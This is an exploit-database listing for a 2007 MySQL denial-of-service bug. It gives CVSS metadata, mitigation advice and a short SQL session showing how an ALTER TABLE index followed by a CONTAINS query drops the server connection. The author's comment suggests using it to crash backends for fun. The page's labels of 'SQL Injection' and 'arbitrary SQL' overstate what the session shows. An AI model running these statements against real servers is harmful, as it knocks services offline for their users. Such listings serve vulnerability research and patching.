MySQL - exploit.company

vendor:

MySQL

by:

Kristian Erik Hermansen

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: MySQL

Affected Version From: MySQL <=6.0

Affected Version To: MySQL <=6.0

Patch Exists: NO

Related CWE:

CPE: a:mysql:mysql:6.0

Metasploit:

Other Scripts:

Platforms Tested:

2007

MySQL <=6.0 SQL Injection Vulnerability

The vulnerability allows an attacker with ALTER permissions to execute arbitrary SQL statements, leading to a denial of service (DoS) by causing the MySQL server to lose connection. The exploit involves using the ALTER TABLE statement on a table and field known to exist.

Mitigation:

Ensure that MySQL users with ALTER permissions are trusted and properly authenticated. Regularly update MySQL to the latest version to prevent exploitation.

Source

Exploit-DB raw data:

/*
 * MySQL <=6.0 possibly affected
 * Kristian Erik Hermansen
 * Credit: Joe Gallo
 * You must have ALTER permissions to exploit this bug!
 * Scenario: You found SQL injection, but you want to punch backend server
 * in the nuts just for fun.  Start with the ALTER TABLE statement on
 * a table and field you know to exist.  The first two SQL statements are
 * simply to demostrate reproducibility...
 */

<snip>
mysql> CREATE TABLE `test` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
  `foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set

mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0  Duplicates: 0  Warnings: 0

mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
ERROR 2013 : Lost connection to MySQL server during query
</snip>

# milw0rm.com [2007-11-09]